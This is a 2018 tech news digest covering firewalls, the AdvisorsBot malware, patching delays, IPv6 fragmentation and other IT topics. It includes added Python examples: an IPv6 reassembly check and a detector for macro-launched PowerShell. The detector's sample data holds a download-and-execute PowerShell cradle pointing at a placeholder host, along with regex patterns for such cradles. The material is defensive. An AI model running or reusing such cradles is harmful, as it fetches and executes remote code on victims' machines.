Daily Tech Digest - August 27, 2018

What are next generation firewalls? How the cloud and complexity affect them

So far, nextgen firewall vendors haven't been able to fully translate their features to the needs of cloud environments, says NSS Labs' Spanbauer. "This is a significant engineering feat, and we're not quite there yet with a perfect replica, virtualized or physical." However, they are taking advantage of other capabilities that cloud offers, including the real-time sharing of threat intelligence data. "If you're patient zero, then that's an incredibly difficult scenario to block against," he says. "However, if you give it a minute or two minutes, then patient 10 or 15 to 20, with real-time updates, can be protected by virtue of the cloud abilities of the firewall." There's also the possibility of nextgen firewalls expanding into the endpoint security space. "If they merged, that would be a lot easier for enterprises to manage," says Spanbauer. "But that's not going to happen." Perimeter protection and endpoint protection will remain distinct for the foreseeable future, but the two sets of technologies could mutually benefit one another, he says.



Modular Downloaders Could Pose New Threat for Enterprises

The threat actor behind the campaign — an entity that Proofpoint identifies as TA555 — has been distributing AdvisorsBot via phishing emails containing a macro that initially executed a PowerShell command to download the malware. Since early August, the attacker has been using a macro to run a PowerShell command, which then downloads a PowerShell script capable of running AdvisorsBot without writing it to disk first, Proofpoint said. Interestingly, since first releasing the malware in May, its authors have completely rewritten it in PowerShell and .NET. Proofpoint has dubbed the new variant PoshAdvisor and describes it as not identical to AdvisorsBot but containing many of the same functions, including the ability to download additional modules. ... It is certainly unusual for malware authors to do so and may be an attempt to further evade defenses. "For the enterprise, more variety in the threat landscape and newly coded malware increase complexity for defenders and should be driving investments in threat intelligence, robust layered defenses, and end user education," she says.
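Detection logic for the delivery chain described above (an Office macro spawning PowerShell, which fetches a script over the network and runs it without touching disk), written as an added example rather than Proofpoint's or the article's code. The event records, their field names and the placeholder URL are constructed to resemble process-creation telemetry, not taken from any real incident.

```python
"""Flag PowerShell launched from an Office process with a download cradle
and in-memory execution markers. Added example; events are constructed."""
import re
from typing import Dict, List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Command-line markers: fetching content over the network ...
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
# ... and executing it in memory instead of from a file on disk.
INMEM_RE = re.compile(r"invoke-expression|\biex\b|-enc(odedcommand)?\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the findings for one process-creation event (empty if benign)."""
    if basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return []
    findings = []
    if basename(event["parent_image"]) in OFFICE_PARENTS:
        findings.append("office-spawned-powershell")
    if DOWNLOAD_RE.search(event["command_line"]):
        findings.append("network-download-cradle")
    if INMEM_RE.search(event["command_line"]):
        findings.append("in-memory-execution")
    return findings


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map event id -> findings, keeping only events that raised something."""
    result = {}
    for event in events:
        findings = classify(event)
        if findings:
            result[event["id"]] = findings
    return result


# Constructed sample events; the URL is a placeholder, not an indicator.
SAMPLE_EVENTS = [
    {"id": "e1", "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/placeholder.ps1')\""},
    {"id": "e2", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Service -Name Spooler"},
    {"id": "e3", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": "pwsh.exe -c \"Invoke-WebRequest -Uri http://example.invalid/p.msi"
                     " -OutFile C:\\tmp\\p.msi\""},
]
```

Only e1 raises all three findings together; e3 shows that a download alone is a weaker signal worth correlating rather than alerting on by itself.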


Machine learning turns unstructured secondary storage into globally accessible data

It’s important to note, particularly for security-minded organizations, that Cohesity isn’t aggregating the data, just the object metadata, which then points to where the data is. Now storage administrators can globally roll out policies or make upgrades across the multi-node environment with a single click. ... One of the biggest and underappreciated benefits of SaaS is the ability to aggregate data across multiple customers and compare the data. In one’s consumer life, think of Amazon providing recommendations such as “Customers that bought X also bought Y.” Cohesity can compare data and understand its utilization or backup frequency or other data management capabilities against its peers and then make the appropriate changes. Digital CIOs need to shed conventional thinking around storage and think more about globally accessible and optimized data. This becomes particularly important in the ML era, when the quality of data can make the difference between being a market leader or a laggard. In particular, secondary storage may be the biggest, wasted resource that a company has, and being able to harness the knowledge and insights captured in it could help organizations accelerate their digital transformation efforts.


Why do enterprises take a long time to install vital security updates?

The failure to rapidly deploy and install security updates is placing businesses at greater risk of a targeted cyberattack, as hackers look to exploit the vulnerabilities of outdated systems. Kollective’s report also found that 37% of IT managers list ‘a failure to install updates’ as the biggest security threat of 2018. This makes outdated software a bigger threat than password vulnerabilities (33%), BYOA / BYOD (22%) and unsecured USB sticks (9%). Even more startling, 13% of large businesses have given up on actively managing software distribution, and are, instead, passively asking employees to update their own systems. Kollective blames the failure to install updates on a combination of slow testing procedures and an inability to distribute updates automatically at scale. As Dan Vetras, CEO of Kollective explains: “Following numerous corporate cyberattacks over the last 12 months, today’s businesses are spending more than ever before on enhancing and improving their security systems. But, this investment is wasted if they aren’t keeping their systems up-to-date.


Here comes ‘antidisinformation as a service’

Most of the disinformation accounts deleted by Facebook, Twitter, Google and Microsoft were discovered not by those companies or the U.S. government, but by a company called FireEye. I told you in this space last year about disinformation as a service (DaaS). Most of the Russian disinformation campaigns are carried out by a private company called the Internet Research Agency. But now comes AaaS — antidisinformation as a service. That’s what FireEye provided this week to the Silicon Valley social networking companies. It considers itself a kind of NSA for hire — an intelligence organization, but for enterprises. How does it do it? FireEye’s methodology is multifaceted and a trade secret. But the company’s core competencies lie in discovering hidden malware and network hacks with the use of proprietary technology to detect behavioral anomalies — behavior by code and websites that isn’t normal. Once it finds the general nature of the weird behavior, it then does a lot of shoe-leather research.


What IPv6 features can be found in the latest specification?


The core IPv6 specification -- RFC 2460 -- has changed considerably since it was first released. The new IPv6 features are geared toward reliability, as well as operational and security considerations. To that end, the revised spec contains a security analysis of IPv6, with references to some of the work that's been carried out during the last few years, particularly in the area of IPv6 addressing. Other enhancements target IPv6 extension headers and fragmentation. For example, the original IPv6 specification allowed overlapping fragments -- that is, fragments that covered the same chunk of data from the original unfragmented datagram. The use of overlapping fragments to circumvent security controls was already very popular in the IPv4 world. However, even though there was no legitimate use for them in the IPv6 world, overlapping fragments were still considered valid. Such fragments were eventually declared illegal by RFC 5722, which was published in 2009. Thus, the new specification incorporates that update, banning overlapping fragments.
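The rule the paragraph describes, applied at reassembly: if any fragment of a datagram overlaps another, the whole datagram is discarded rather than reassembled. This is an added example, not code from the article or from any RFC; the `Fragment` record models only the Fragment Offset, M flag and payload of the IPv6 Fragment header, and the fragment sets a caller passes in are constructed, not captured.

```python
"""Reassembly check enforcing the RFC 5722 rule the revised IPv6 spec
carries forward: overlapping fragments mean the datagram is dropped.
Added example; Fragment is a simplified model, not a packet parser."""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Fragment:
    offset: int      # Fragment Offset field, in 8-octet units
    payload: bytes   # fragmentable part carried by this fragment
    more: bool       # M flag: True on every fragment except the last

    @property
    def start(self) -> int:
        return self.offset * 8

    @property
    def end(self) -> int:
        return self.start + len(self.payload)


def reassemble(frags: List[Fragment]) -> Tuple[str, Optional[bytes]]:
    """Return (verdict, data). Verdicts: 'ok' with the reassembled payload,
    'overlap' (drop the whole datagram, RFC 5722), 'incomplete' (fragments
    still missing) or 'malformed' (length or M-flag rules violated)."""
    if not frags:
        return "incomplete", None
    ordered = sorted(frags, key=lambda f: f.start)
    covered_to = 0  # first byte of the original payload not yet covered
    for frag in ordered:
        if frag.more and len(frag.payload) % 8:
            return "malformed", None  # non-final fragments are 8-octet multiples
        if frag.start < covered_to:
            # Re-covers bytes an earlier fragment carried. Exact duplicates
            # count too: RFC 5722 discards the datagram on any overlap.
            return "overlap", None
        if frag.start > covered_to:
            return "incomplete", None  # hole before this fragment
        covered_to = frag.end
    if ordered[-1].more:
        return "incomplete", None      # final fragment (M=0) not seen yet
    if any(not f.more for f in ordered[:-1]):
        return "malformed", None       # only the last fragment may carry M=0
    return "ok", b"".join(f.payload for f in ordered)
```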


Microsoft, Salesforce plan to open source major enterprise software products

Microsoft ultimately decided that ONE is too important to keep to itself. “We have decided that this is such an important resource for everybody that just hoarding it ourselves is not the right thing to do,” Bahl said. “So, we are making it available to the entire community so that they can now — and it’s not just for production systems, but also for students that are now graduating.” The software will help large enterprises improve their network uptime by simulating changes to their network before rolling them out live. Microsoft hasn’t disclosed where it plans to release ONE, but GitHub — which Microsoft is in the process of acquiring — seems the logical choice. TransmogrifAI is an automated machine learning library for structured data, which makes sense coming from Salesforce, since its CRM products are built on the traditional row-and-column structure of a relational database. It’s written in Scala and built on top of Apache Spark, Apache’s in-memory analytics software.


Microsoft ups effort to drive Surface Go adoption

One of the most fascinating things about executive leadership in most technology firms is that they generally don’t get marketing. It doesn’t seem to be taught in engineering schools, and even those who get business degrees either opt not to take those classes or didn’t understand what they were taught. The result is that, in general, marketing is underfunded and staffed by people who don’t understand the critical parts of human nature that form the foundation of successful marketing campaigns. Apple, during Steve Jobs’ tenure, was my best example of a firm that truly got the power of marketing, and that company rose to be the most valuable (in terms of market cap) company in the segment. This was even though, for much of the time, it has been largely a one-product company (iPod to iPhone). Apple outspent everyone it competed with, with the occasional exception of Samsung, which only occasionally outspent Apple, with powerful competitive results (it is taking regular shots at Apple).


10 common pitfalls that threaten data quality strategies


“Implementing a data quality strategy is not as simple as installing a tool or a one-time fix,” explains Patty Haines, president and founder of Chimney Rock Information Solutions, Inc., a consultancy that aids organizations in building business intelligence and analytics environments by providing data warehouse and business intelligence services, solutions and mentoring. “Organizations across the enterprise need to work together to identify, assess, remediate, and monitor data with the goal of continual data improvements.” Haines offers her advice on 10 top challenges to a successful data quality strategy. ... “If differences in the definition and use of data continue, it can allow poor quality data to be entered, managed and reported,” Haines says. “The data quality strategy must include the business community, data governance, and subject matter experts working together to determine consistent and agreed-upon definitions to improve the quality of data.”


Why Facebook is powerless to stop its own descent

You could certainly argue that Facebook's problems aren't all of its own making. It's a tool that people use in whatever ways they decide. The fact that humanity has used the social network to power a renewal of tribalism, nationalism, and bigotry is hardly a phenomenon that Facebook or anyone else would have predicted. The problem for Facebook is that it took so long to respond--and it only truly did so after the issue became a PR nightmare. It had the opportunity to step up and figure out where the line was between healthy dialogue and hate speech, and it passed the buck. It prioritized user growth and activity over creating a healthy platform. A crisis doesn't build character, it reveals it--as the aphorism goes. Facebook has lost credibility. Few believe that it can be a leader in solving a problem that it helped create. As a result, the narrative around Facebook as a company and a platform is that it doesn't look out for its users' best interests. It doesn't put them first. And so more people are tuning out.



Quote for the day:


"Defeat is not the worst of failures. Not to have tried is the true failure." -- George Woodberry